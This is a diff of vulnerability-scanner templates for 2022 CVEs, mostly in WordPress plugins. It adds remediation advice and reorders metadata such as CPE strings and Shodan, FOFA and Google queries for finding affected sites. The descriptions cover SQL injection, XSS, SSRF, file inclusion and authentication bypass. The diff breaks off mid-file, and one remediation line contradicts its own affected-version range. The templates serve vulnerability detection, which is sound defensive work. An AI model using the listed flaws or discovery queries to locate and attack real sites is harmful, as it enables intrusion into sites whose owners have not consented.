a/http/cves/2022/CVE-2022-0346.yaml b/http/cves/2022/CVE-2022-0346.yaml index d39700010b..5f0345c088 100644 --- a/http/cves/2022/CVE-2022-0346.yaml +++ b/http/cves/2022/CVE-2022-0346.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on. + remediation: | + Update the WordPress XML Sitemap Generator for Google plugin to version 2.0.4 or later to mitigate the XSS and RCE vulnerabilities. reference: - https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6 - https://wordpress.org/plugins/www-xml-sitemap-generator-org/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-0346 cwe-id: CWE-79 epss-score: 0.00099 - cpe: cpe:2.3:a:xmlsitemapgenerator:xml_sitemap_generator:*:*:*:*:*:wordpress:*:* epss-percentile: 0.40272 + cpe: cpe:2.3:a:xmlsitemapgenerator:xml_sitemap_generator:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: xmlsitemapgenerator product: xml_sitemap_generator + framework: wordpress tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org http: diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml index 7f2829e256..264b477420 100644 --- a/http/cves/2022/CVE-2022-0349.yaml +++ b/http/cves/2022/CVE-2022-0349.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress NotificationX plugin prior to 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape the nx_id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the WordPress NotificationX plugin (2.3.9 or higher) to mitigate the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/1d0dd7be-29f3-4043-a9c6-67d02746463a - https://wordpress.org/plugins/notificationx/advanced/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-0349 cwe-id: CWE-89 epss-score: 0.01307 - cpe: cpe:2.3:a:wpdeveloper:notificationx:*:*:*:*:*:wordpress:*:* epss-percentile: 0.84219 + cpe: cpe:2.3:a:wpdeveloper:notificationx:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: wpdeveloper product: notificationx + framework: wordpress tags: cve2022,wordpress,wp-plugin,wp,sqli,notificationx,wpscan,cve http: diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml index 3a7d249aec..5507b7f9ce 100644 --- a/http/cves/2022/CVE-2022-0378.yaml +++ b/http/cves/2022/CVE-2022-0378.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11. + remediation: | + Apply the latest security patch or upgrade to a version that has addressed the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-0378 - https://github.com/microweber/microweber/commit/fc7e1a026735b93f0e0047700d08c44954fce9ce @@ -15,13 +17,13 @@ info: cve-id: CVE-2022-0378 cwe-id: CWE-79 epss-score: 0.001 - cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* epss-percentile: 0.40521 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.favicon.hash:780351152 vendor: microweber product: microweber + shodan-query: http.favicon.hash:780351152 tags: cve,cve2022,microweber,xss,huntr http: diff --git a/http/cves/2022/CVE-2022-0381.yaml b/http/cves/2022/CVE-2022-0381.yaml index b947d1e954..bb22e2e1af 100644 --- a/http/cves/2022/CVE-2022-0381.yaml +++ b/http/cves/2022/CVE-2022-0381.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Embed Swagger plugin 1.0.0 and prior contains a reflected cross-site scripting vulnerability due to insufficient escaping/sanitization and validation via the url parameter found in the ~/swagger-iframe.php file, which allows attackers to inject arbitrary web scripts onto the page. + remediation: | + Update to the latest version of the WordPress Embed Swagger plugin (1.0.0) or apply a patch provided by the vendor. reference: - https://gist.github.com/Xib3rR4dAr/4b3ea7960914e23c3a875b973a5b37a3 - https://www.wordfence.com/vulnerability-advisories/#CVE-2022-0381 @@ -17,13 +19,13 @@ info: cve-id: CVE-2022-0381 cwe-id: CWE-79 epss-score: 0.00218 - cpe: cpe:2.3:a:embed_swagger_project:embed_swagger:*:*:*:*:*:wordpress:*:* epss-percentile: 0.59071 + cpe: cpe:2.3:a:embed_swagger_project:embed_swagger:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: embed_swagger_project product: embed_swagger + framework: wordpress tags: cve,cve2022,swagger,xss,wordpress http: diff --git a/http/cves/2022/CVE-2022-0412.yaml b/http/cves/2022/CVE-2022-0412.yaml index 991f545c34..5f6fc921df 100644 --- a/http/cves/2022/CVE-2022-0412.yaml +++ b/http/cves/2022/CVE-2022-0412.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress TI WooCommerce Wishlist plugin before 1.40.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint. + remediation: | + Update to the latest version of the TI WooCommerce Wishlist plugin (1.40.1 or higher). reference: - https://wpscan.com/vulnerability/e984ba11-abeb-4ed4-9dad-0bfd539a9682 - https://wordpress.org/plugins/ti-woocommerce-wishlist/advanced/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-0412 cwe-id: CWE-89 epss-score: 0.02963 - cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:*:wordpress:*:* epss-percentile: 0.89567 + cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: templateinvaders product: ti_woocommerce_wishlist + framework: wordpress tags: sqli,ti-woocommerce-wishlist,wpscan,cve,cve2022,woocommerce,wordpress,wp-plugin,wp http: diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml index 37acb2092a..207b99b64d 100644 --- a/http/cves/2022/CVE-2022-0415.yaml +++ b/http/cves/2022/CVE-2022-0415.yaml @@ -6,22 +6,22 @@ info: severity: high description: | Gogs before 0.12.6 is susceptible to remote command execution via the uploading repository file in GitHub repository gogs/gogs. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: Fixed in version 0.12.6. reference: - https://github.com/gogs/gogs/commit/0fef3c9082269e9a4e817274942a5d7c50617284 - https://huntr.dev/bounties/b4928cfe-4110-462f-a180-6d5673797902 - https://nvd.nist.gov/vuln/detail/CVE-2022-0415 - remediation: Fixed in version 0.12.6. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-0415 cwe-id: CWE-20,CWE-434 epss-score: 0.27369 - cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* epss-percentile: 0.96168 + cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: - max-request: 6 verified: true + max-request: 6 vendor: gogs product: gogs tags: rce,gogs,authenticated,huntr,cve,cve2022,intrusive diff --git a/http/cves/2022/CVE-2022-0422.yaml b/http/cves/2022/CVE-2022-0422.yaml index d8be0fb28b..986bbb9ee5 100644 --- a/http/cves/2022/CVE-2022-0422.yaml +++ b/http/cves/2022/CVE-2022-0422.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress White Label CMS plugin before 2.2.9 contains a reflected cross-site scripting vulnerability. It does not sanitize and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing. + remediation: | + Update to WordPress White Label CMS plugin version 2.2.9 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/429be4eb-8a6b-4531-9465-9ef0d35c12cc - https://plugins.trac.wordpress.org/changeset/2672615 @@ -16,13 +18,13 @@ info: cve-id: CVE-2022-0422 cwe-id: CWE-79 epss-score: 0.00133 - cpe: cpe:2.3:a:videousermanuals:white_label_cms:*:*:*:*:*:wordpress:*:* epss-percentile: 0.47722 + cpe: cpe:2.3:a:videousermanuals:white_label_cms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: videousermanuals product: white_label_cms + framework: wordpress tags: cve,cve2022,wordpress,xss,wp-plugin,wpscan http: diff --git a/http/cves/2022/CVE-2022-0432.yaml b/http/cves/2022/CVE-2022-0432.yaml index 245596be85..8dc3b1c1fe 100644 --- a/http/cves/2022/CVE-2022-0432.yaml +++ b/http/cves/2022/CVE-2022-0432.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: The GitHub repository mastodon/mastodon prior to 3.5.0 contains a Prototype Pollution vulnerability. + remediation: | + Apply the latest security patches and updates provided by the Mastodon project to mitigate the vulnerability. reference: - https://github.com/mastodon/mastodon/commit/4d6d4b43c6186a13e67b92eaf70fe1b70ea24a09 - https://drive.google.com/file/d/1vpZ0CcmFhTEUasLTPUBf8o-4l7G6ojtG/view @@ -16,8 +18,8 @@ info: cve-id: CVE-2022-0432 cwe-id: CWE-1321 epss-score: 0.001 - cpe: cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* epss-percentile: 0.40521 + cpe: cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joinmastodon diff --git a/http/cves/2022/CVE-2022-0434.yaml b/http/cves/2022/CVE-2022-0434.yaml index 993d86e3bd..1640243c18 100644 --- a/http/cves/2022/CVE-2022-0434.yaml +++ b/http/cves/2022/CVE-2022-0434.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerability. It does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the WordPress Page Views Count plugin (2.4.15) to mitigate the SQL Injection vulnerability. reference: - https://wpscan.com/vulnerability/be895016-7365-4ce4-a54f-f36d0ef2d6f1 - https://wordpress.org/plugins/page-views-count/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-0434 cwe-id: CWE-89 epss-score: 0.02274 - cpe: cpe:2.3:a:a3rev:page_view_count:*:*:*:*:*:wordpress:*:* epss-percentile: 0.88217 + cpe: cpe:2.3:a:a3rev:page_view_count:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: a3rev product: page_view_count + framework: wordpress tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wpscan,unauth variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-0437.yaml b/http/cves/2022/CVE-2022-0437.yaml index 2543e0ad21..ddefe92a4b 100644 --- a/http/cves/2022/CVE-2022-0437.yaml +++ b/http/cves/2022/CVE-2022-0437.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: NPM karma prior to 6.3.14. contains a DOM-based cross-site Scripting vulnerability. + remediation: | + Upgrade to the latest version of karma-runner that includes proper input sanitization to mitigate this vulnerability. reference: - https://huntr.dev/bounties/64b67ea1-5487-4382-a5f6-e8a95f798885 - https://github.com/karma-runner/karma/commit/839578c45a8ac42fbc1d72105f97eab77dd3eb8a @@ -16,13 +18,13 @@ info: cve-id: CVE-2022-0437 cwe-id: CWE-79 epss-score: 0.001 - cpe: cpe:2.3:a:karma_project:karma:*:*:*:*:*:node.js:*:* epss-percentile: 0.40521 + cpe: cpe:2.3:a:karma_project:karma:*:*:*:*:*:node.js:*:* metadata: max-request: 2 - framework: node.js vendor: karma_project product: karma + framework: node.js tags: oss,huntr,cve,cve2022,karma,xss http: diff --git a/http/cves/2022/CVE-2022-0441.yaml b/http/cves/2022/CVE-2022-0441.yaml index 5a1e1f6a07..197bc2aabf 100644 --- a/http/cves/2022/CVE-2022-0441.yaml +++ b/http/cves/2022/CVE-2022-0441.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress MasterStudy LMS plugin before 2.7.6 is susceptible to improper access control. The plugin does not validate some parameters given when registering a new account, which can allow an attacker to register as an admin, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to the latest version of the MasterStudy LMS plugin (2.7.6 or higher) to fix the improper access control issue. reference: - https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed - https://wordpress.org/plugins/masterstudy-lms-learning-management-system/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-0441 cwe-id: CWE-269 epss-score: 0.37209 - cpe: cpe:2.3:a:stylemixthemes:masterstudy_lms:*:*:*:*:*:wordpress:*:* epss-percentile: 0.96672 + cpe: cpe:2.3:a:stylemixthemes:masterstudy_lms:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: stylemixthemes product: masterstudy_lms + framework: wordpress tags: cve,cve2022,wordpress,wp-plugin,wpscan,wp,unauth variables: username: "{{to_lower(rand_text_alphanumeric(6))}}" diff --git a/http/cves/2022/CVE-2022-0482.yaml b/http/cves/2022/CVE-2022-0482.yaml index aaa714f008..819fb3bd5c 100644 --- a/http/cves/2022/CVE-2022-0482.yaml +++ b/http/cves/2022/CVE-2022-0482.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments. + remediation: | + Upgrade Easy!Appointments to version 1.4.4 or above to fix the Broken Access Control vulnerability. reference: - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/ - https://github.com/alextselegidis/easyappointments @@ -18,13 +20,13 @@ info: cve-id: CVE-2022-0482 cwe-id: CWE-359,CWE-863 epss-score: 0.02425 - cpe: cpe:2.3:a:easyappointments:easyappointments:*:*:*:*:*:wordpress:*:* epss-percentile: 0.88566 + cpe: cpe:2.3:a:easyappointments:easyappointments:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: easyappointments product: easyappointments + framework: wordpress tags: cve,cve2022,easyappointments,huntr http: diff --git a/http/cves/2022/CVE-2022-0535.yaml b/http/cves/2022/CVE-2022-0535.yaml index 84ac33bc47..ebf16bbaa9 100644 --- a/http/cves/2022/CVE-2022-0535.yaml +++ b/http/cves/2022/CVE-2022-0535.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress E2Pdf plugin before 1.16.45 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, even when the unfiltered_html capability is disallowed. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, making it possible to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update the WordPress E2Pdf plugin to version 1.16.45 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/a4162e96-a3c5-4f38-a60b-aa3ed9508985 - https://wordpress.org/plugins/e2pdf/ @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-0535 cwe-id: CWE-79 epss-score: 0.00112 - cpe: cpe:2.3:a:e2pdf:e2pdf:*:*:*:*:*:wordpress:*:* epss-percentile: 0.43647 + cpe: cpe:2.3:a:e2pdf:e2pdf:*:*:*:*:*:wordpress:*:* metadata: - max-request: 4 verified: true - framework: wordpress + max-request: 4 vendor: e2pdf product: e2pdf + framework: wordpress tags: cve2022,wp-plugin,xss,authenticated,e2pdf,wpscan,cve,wordpress,wp http: diff --git a/http/cves/2022/CVE-2022-0540.yaml b/http/cves/2022/CVE-2022-0540.yaml index 3a4b92fee9..16add28a26 100644 --- a/http/cves/2022/CVE-2022-0540.yaml +++ b/http/cves/2022/CVE-2022-0540.yaml @@ -6,26 +6,26 @@ info: severity: critical description: | Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0. + remediation: Ensure you are using the latest version and that all security patches have been applied. reference: - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0540 - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20 - https://jira.atlassian.com/browse/JRASERVER-73650 - https://jira.atlassian.com/browse/JSDSERVER-11224 - remediation: Ensure you are using the latest version and that all security patches have been applied. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0540 cwe-id: CWE-287 epss-score: 0.16241 - cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* epss-percentile: 0.95289 + cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Atlassian Jira" vendor: atlassian product: jira_data_center + shodan-query: http.component:"Atlassian Jira" tags: cve,cve2022,atlassian,jira,exposure,auth-bypass http: diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index e71bf4be70..d5ce387354 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users. + remediation: | + Upgrade to Formcraft3 version 3.8.28 or later to fix the SSRF vulnerability. reference: - https://wpscan.com/vulnerability/b5303e63-d640-4178-9237-d0f524b13d47 - https://nvd.nist.gov/vuln/detail/CVE-2022-0591 @@ -15,15 +17,15 @@ info: cve-id: CVE-2022-0591 cwe-id: CWE-918 epss-score: 0.00694 - cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:* epss-percentile: 0.77706 + cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - fofa-query: body="formcraft3" && body="wp-" - framework: wordpress + max-request: 1 vendor: subtlewebinc product: formcraft3 + framework: wordpress + fofa-query: body="formcraft3" && body="wp-" tags: wp,wp-plugin,wordpress,cve,formcraft3,wpscan,ssrf,cve2022,unauth http: diff --git a/http/cves/2022/CVE-2022-0594.yaml b/http/cves/2022/CVE-2022-0594.yaml index 7aa8b9dcb2..5723836d28 100644 --- a/http/cves/2022/CVE-2022-0594.yaml +++ b/http/cves/2022/CVE-2022-0594.yaml @@ -5,6 +5,8 @@ info: author: atomiczsec severity: medium description: WordPress Shareaholic plugin prior to 9.7.6 is susceptible to information disclosure. The plugin does not have proper authorization check in one of the AJAX actions, available to both unauthenticated (before 9.7.5) and authenticated (in 9.7.5) users, allowing them to possibly obtain sensitive information such as active plugins and different versions (PHP, cURL, WP, etc.). + remediation: | + Update the Shareaholic plugin to version 9.7.6 or later to fix the information disclosure vulnerability. reference: - https://wpscan.com/vulnerability/4de9451e-2c8d-4d99-a255-b027466d29b1 - https://wordpress.org/plugins/shareaholic/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-0594 cwe-id: CWE-863 epss-score: 0.00257 - cpe: cpe:2.3:a:shareaholic:shareaholic:*:*:*:*:*:wordpress:*:* epss-percentile: 0.62773 + cpe: cpe:2.3:a:shareaholic:shareaholic:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: shareaholic product: shareaholic + framework: wordpress tags: cve,cve2022,wordpress,wp,wp-plugin,exposure,wpscan http: diff --git a/http/cves/2022/CVE-2022-0595.yaml b/http/cves/2022/CVE-2022-0595.yaml index 1092e3601b..d7f8306b69 100644 --- a/http/cves/2022/CVE-2022-0595.yaml +++ b/http/cves/2022/CVE-2022-0595.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Contact Form 7 before 1.3.6.3 contains an unauthenticated stored cross-site scripting vulnerability in the Drag and Drop Multiple File Upload plugin. SVG files can be uploaded by default via the dnd_codedropz_upload AJAX action. + remediation: | + Update the WordPress Contact Form 7 plugin to version 1.3.6.3 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/1b849957-eaca-47ea-8f84-23a3a98cc8de - https://plugins.trac.wordpress.org/changeset/2686614 @@ -15,13 +17,13 @@ info: cve-id: CVE-2022-0595 cwe-id: CWE-79 epss-score: 0.00135 - cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:* epss-percentile: 0.48139 + cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: codedropz product: drag_and_drop_multiple_file_upload_-_contact_form_7 + framework: wordpress tags: cve,cve2022,xss,wordpress,wp-plugin,wpscan,fileupload,intrusive,unauth http: diff --git a/http/cves/2022/CVE-2022-0599.yaml b/http/cves/2022/CVE-2022-0599.yaml index f390b778a7..78ad436fba 100644 --- a/http/cves/2022/CVE-2022-0599.yaml +++ b/http/cves/2022/CVE-2022-0599.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page. + remediation: | + Update to the latest version of the WordPress Mapping Multiple URLs Redirect Same Page plugin (version 5.8 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/4f1d45bc-d3bd-472c-959d-05abeff32765 - https://wordpress.org/plugins/mapping-multiple-urls-redirect-same-page/ @@ -16,13 +18,13 @@ info: cve-id: CVE-2022-0599 cwe-id: CWE-79 epss-score: 0.00119 - cpe: cpe:2.3:a:mapping_multiple_urls_redirect_same_page_project:mapping_multiple_urls_redirect_same_page:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45304 + cpe: cpe:2.3:a:mapping_multiple_urls_redirect_same_page_project:mapping_multiple_urls_redirect_same_page:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: mapping_multiple_urls_redirect_same_page_project product: mapping_multiple_urls_redirect_same_page + framework: wordpress tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated,wpscan http: diff --git a/http/cves/2022/CVE-2022-0653.yaml b/http/cves/2022/CVE-2022-0653.yaml index 03f80548a9..9cd9df8a14 100644 --- a/http/cves/2022/CVE-2022-0653.yaml +++ b/http/cves/2022/CVE-2022-0653.yaml @@ -6,24 +6,24 @@ info: severity: medium description: | The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.. + remediation: Upgrade to version 3.6.5 or later. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653 - https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/ - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2655168%40profile-builder&new=2655168%40profile-builder&sfp_email=&sfph_mail= - remediation: Upgrade to version 3.6.5 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0653 cwe-id: CWE-79 epss-score: 0.00274 - cpe: cpe:2.3:a:cozmoslabs:profile_builder:*:*:*:*:*:wordpress:*:* epss-percentile: 0.64008 + cpe: cpe:2.3:a:cozmoslabs:profile_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: cozmoslabs product: profile_builder + framework: wordpress tags: cve,cve2022,wordpress,xss,wp-plugin http: diff --git a/http/cves/2022/CVE-2022-0656.yaml b/http/cves/2022/CVE-2022-0656.yaml index 4a69a25efb..0dd691838f 100644 --- a/http/cves/2022/CVE-2022-0656.yaml +++ b/http/cves/2022/CVE-2022-0656.yaml @@ -5,6 +5,8 @@ info: author: akincibor severity: high description: uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc). + remediation: | + Upgrade uDraw to version 3.3.3 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/925c4c28-ae94-4684-a365-5f1e34e6c151 - https://nvd.nist.gov/vuln/detail/CVE-2022-0656 @@ -14,14 +16,14 @@ info: cve-id: CVE-2022-0656 cwe-id: CWE-552 epss-score: 0.00641 - cpe: cpe:2.3:a:webtoprint:web_to_print_shop\:udraw:*:*:*:*:*:wordpress:*:* epss-percentile: 0.76583 + cpe: cpe:2.3:a:webtoprint:web_to_print_shop\:udraw:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - google-query: inurl:"/wp-content/plugins/udraw" verified: true + max-request: 1 vendor: webtoprint product: web_to_print_shop\ + google-query: inurl:"/wp-content/plugins/udraw" tags: wp,wordpress,wp-plugin,unauth,cve,cve2022,lfi,udraw,wpscan http: diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml index b095be07cf..e2424de0d1 100644 --- a/http/cves/2022/CVE-2022-0660.yaml +++ b/http/cves/2022/CVE-2022-0660.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Microweber before 1.2.11 is susceptible to information disclosure. An error message is generated in microweber/microweber which contains sensitive information while viewing comments from load_module:comments#search=. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade Microweber to version 1.2.11 or later to mitigate the vulnerability. reference: - https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291/ - https://github.com/advisories/GHSA-hhrj-wp42-32v3 @@ -18,11 +20,11 @@ info: cve-id: CVE-2022-0660 cwe-id: CWE-209 epss-score: 0.00654 - cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* epss-percentile: 0.76848 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: microweber product: microweber tags: cve2022,microweber,disclosure,authenticated,huntr,cve diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml index 2b315491d1..98be7352f2 100644 --- a/http/cves/2022/CVE-2022-0678.yaml +++ b/http/cves/2022/CVE-2022-0678.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Packagist prior to 1.2.11 contains a cross-site scripting vulnerability via microweber/microweber. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out. + remediation: | + Upgrade Microweber CMS to version 1.2.11 or later, which includes a fix for this vulnerability. reference: - https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0/ - https://twitter.com/CVEnew/status/1495001503249178624?s=20&t=sfABvm7oG39Fd6rG44vQWg @@ -18,14 +20,14 @@ info: cve-id: CVE-2022-0678 cwe-id: CWE-79 epss-score: 0.00135 - cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* epss-percentile: 0.4804 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.favicon.hash:780351152 verified: true + max-request: 1 vendor: microweber product: microweber + shodan-query: http.favicon.hash:780351152 tags: huntr,cve,cve2022,xss,microweber http: diff --git a/http/cves/2022/CVE-2022-0679.yaml b/http/cves/2022/CVE-2022-0679.yaml index ba00e54bfa..fd1fce7c9e 100644 --- a/http/cves/2022/CVE-2022-0679.yaml +++ b/http/cves/2022/CVE-2022-0679.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Narnoo Distributor plugin 2.5.1 and prior is susceptible to local file inclusion. The plugin does not validate and sanitize the lib_path parameter before being passed into a call to require() via the narnoo_distributor_lib_request AJAX action, and the content of the file is displayed in the response as JSON data. This can also lead to a remote code execution vulnerability depending on system and configuration. + remediation: | + Update to the latest version of the WordPress Narnoo Distributor plugin (>=2.5.2) to mitigate the LFI vulnerability. reference: - https://wpscan.com/vulnerability/0ea79eb1-6561-4c21-a20b-a1870863b0a8 - https://nvd.nist.gov/vuln/detail/CVE-2022-0679 @@ -15,14 +17,14 @@ info: cve-id: CVE-2022-0679 cwe-id: CWE-22 epss-score: 0.02484 - cpe: cpe:2.3:a:narnoo_distributor_project:narnoo_distributor:*:*:*:*:*:wordpress:*:* epss-percentile: 0.88704 + cpe: cpe:2.3:a:narnoo_distributor_project:narnoo_distributor:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: narnoo_distributor_project product: narnoo_distributor + framework: wordpress tags: narnoo-distributor,cve,cve2022,wordpress,wp-plugin,wpscan,wp,rce,unauth,lfi http: diff --git a/http/cves/2022/CVE-2022-0692.yaml b/http/cves/2022/CVE-2022-0692.yaml index 4f91798038..1b86f1d7bc 100644 --- a/http/cves/2022/CVE-2022-0692.yaml +++ 